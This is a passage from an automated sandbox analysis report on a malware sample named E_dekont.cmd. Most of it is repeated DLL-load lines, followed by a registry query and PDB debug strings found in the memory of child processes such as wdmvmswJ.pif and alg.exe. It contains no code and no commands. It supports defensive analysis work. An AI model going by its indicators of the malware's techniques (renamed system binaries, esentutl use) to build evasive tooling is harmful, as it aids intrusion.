                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: E_dekont.cmdStatic file information: File size 1052051 > 1048576
                Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: wdmvmswJ.pif, 0000000C.00000003.1554599936.0000000023230000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: wdmvmswJ.pif, 0000000C.00000003.1983421861.0000000024350000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: wdmvmswJ.pif, 0000000C.00000003.2098174285.0000000024350000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: wdmvmswJ.pif, 0000000C.00000003.2098174285.0000000024350000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: msiexec.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1706447973.0000000024370000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jjs_objs\jjs.pdb source: alg.exe, 00000010.00000003.2977864019.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: mavinject32.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.2383278080.0000000020960000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.2379043668.0000000020950000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2926599466.00000000012C0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: PresentationFontCache.pdb source: wdmvmswJ.pif, 0000000C.00000003.1618765999.0000000024380000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2877167712.0000000001480000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: PerceptionSimulationService.pdb source: wdmvmswJ.pif, 0000000C.00000003.1721671796.0000000024360000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: wdmvmswJ.pif, 0000000C.00000003.2072870006.0000000020950000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: MsSense.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1785492049.0000000025210000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: wdmvmswJ.pif, 0000000C.00000003.2359651772.000000001E730000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2923425427.00000000012C0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: MsSense.pdb source: wdmvmswJ.pif, 0000000C.00000003.1785492049.0000000025210000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: wdmvmswJ.pif, 0000000C.00000003.2276020899.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.2267524660.000000001E750000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2912565360.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\tnameserv_objs\tnameserv.pdb source: alg.exe, 00000010.00000003.2990957366.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\servertool_objs\servertool.pdb source: alg.exe, 00000010.00000003.2987868731.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: ping.pdb source: esentutl.exe, 00000009.00000003.1537565062.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, xpha.pif, 00000012.00000000.1589664905.0000000000891000.00000020.00000001.01000000.0000000C.sdmp
                Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1596957974.0000000023410000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmid_objs\rmid.pdb source: alg.exe, 00000010.00000003.2986208127.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java-rmi_objs\java-rmi.pdb source: alg.exe, 00000010.00000003.2974357660.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdb source: wdmvmswJ.pif, 0000000C.00000003.2007367357.0000000024340000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: easinvoker.pdb source: x.exe, x.exe, 00000004.00000003.1478393290.000000007FB90000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1477425750.000000007FE00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1582582313.000000002081D000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1582582313.000000002084D000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp
                Source: Binary string: Acrobat_SL.pdb source: wdmvmswJ.pif, 0000000C.00000003.1992587018.0000000024350000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000008.00000003.1530165716.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, alpha.pif, 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 0000000F.00000001.1581602644.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 0000000F.00000000.1581239901.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000011.00000001.1589367046.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000011.00000002.1700298021.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000020.00000002.1717123382.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000020.00000001.1716784161.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000021.00000001.1724048188.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000021.00000002.1724251285.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000023.00000002.1729021855.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000023.00000001.1728408630.0000000000011000.00000020.00000001.01000000.0000000B.sdmp
                Source: Binary string: ping.pdbGCTL source: esentutl.exe, 00000009.00000003.1537565062.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, 00000012.00000000.1589664905.0000000000891000.00000020.00000001.01000000.0000000C.sdmp
                Source: Binary string: easinvoker.pdbH source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp
                Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\policytool_objs\policytool.pdb source: alg.exe, 00000010.00000003.2985347717.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: maintenanceservice.pdb source: wdmvmswJ.pif, 0000000C.00000003.1641792567.0000000024370000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: wdmvmswJ.pif, 0000000C.00000003.2359651772.000000001E730000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2923425427.00000000012C0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: PerfHost.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1753697067.00000000209F0000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.1728123927.0000000025210000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.1731106579.00000000209D0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: wdmvmswJ.pif, 0000000C.00000003.2144195966.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmid_objs\rmid.pdb source: alg.exe, 00000010.00000003.2986208127.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: GoogleUpdate_unsigned.pdb source: alg.exe, 00000010.00000003.2967850181.00000000012C0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: PerfHost.pdb source: wdmvmswJ.pif, 0000000C.00000003.1753697067.00000000209F0000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.1728123927.0000000025210000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.1731106579.00000000209D0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: wdmvmswJ.pif, 0000000C.00000003.2166655404.000000001E710000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\keytool_objs\keytool.pdb source: alg.exe, 00000010.00000003.2980211327.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\tnameserv_objs\tnameserv.pdb source: alg.exe, 00000010.00000003.2990957366.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java-rmi_objs\java-rmi.pdb source: alg.exe, 00000010.00000003.2974357660.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: wdmvmswJ.pif, 0000000C.00000003.2276020899.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.2267524660.000000001E750000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2912565360.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: TieringEngineService.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1850517986.0000000024380000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: TieringEngineService.pdb source: wdmvmswJ.pif, 0000000C.00000003.1850517986.0000000024380000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: ALG.pdb source: wdmvmswJ.pif, 0000000C.00000003.1580481767.0000000023220000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\orbd_objs\orbd.pdb source: alg.exe, 00000010.00000003.2983872074.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: msdtcexe.pdb source: wdmvmswJ.pif, 0000000C.00000003.1651954044.00000000209E0000.00000004.00001000.00020000.00000000.sdmp
